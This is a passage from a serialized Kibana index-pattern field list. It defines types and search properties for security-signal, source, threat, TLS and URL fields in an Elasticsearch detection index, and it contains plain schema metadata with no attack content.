,\"name\":\"signal.original_event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"signal.original_event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_time\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.author\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.building_block_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.created_at\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.created_by\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.enabled\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.false_positives\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.from\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.immutable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.interval\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.language\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.max_signals\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.note\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"signal.rule.output_index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.query\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.references\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.operator\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.risk_score_mapping.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.rule_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.rule_name_override\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.saved_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.operator\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.severity_mapping.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.size\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threshold.field\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.threshold.value\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timeline_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timeline_title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.timestamp_override\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.to\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.updated_at\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.updated_by\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.threshold_count\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.as.organization.name\"}}},{\"count\":0,\"name\":\"source.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.user.full_name\"}}},{\"count\":0,\"name\":\"source.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"source.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"source.user.name\"}}},{\"count\":0,\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"threat.technique.name\"}}},{\"count\":0,\"name\":\"threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.cipher\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.certificate\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.certificate_chain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.issuer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.ja3\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.not_after\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.not_before\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.server_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.subject\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.supported_ciphers\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.curve\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.established\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.next_protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.resumed\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.certificate\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.certificate_chain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.issuer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.ja3s\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.not_after\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.not_before\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.subject\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.version_protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"trace.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"transaction.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.extension\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0